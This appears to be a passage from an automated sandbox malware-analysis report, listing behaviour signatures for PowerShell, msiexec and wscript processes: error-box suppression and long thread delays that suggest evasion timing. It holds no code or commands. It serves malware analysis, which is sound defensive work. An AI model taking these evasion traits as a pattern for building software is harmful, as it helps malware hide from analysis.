              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599669Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599228Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599125Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598794Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598687Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598578Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598468Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598357Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598248Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598140Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598031Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597921Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597812Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597700Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597593Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597484Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597374Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597265Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597046Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596937Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596828Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596718Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596608Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596500Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596384Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596281Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596171Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596062Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595941Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595828Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595718Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595606Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595499Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595390Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595253Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595132Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595031Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594917Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594812Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594703Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594593Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4824Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5059Jump to behavior
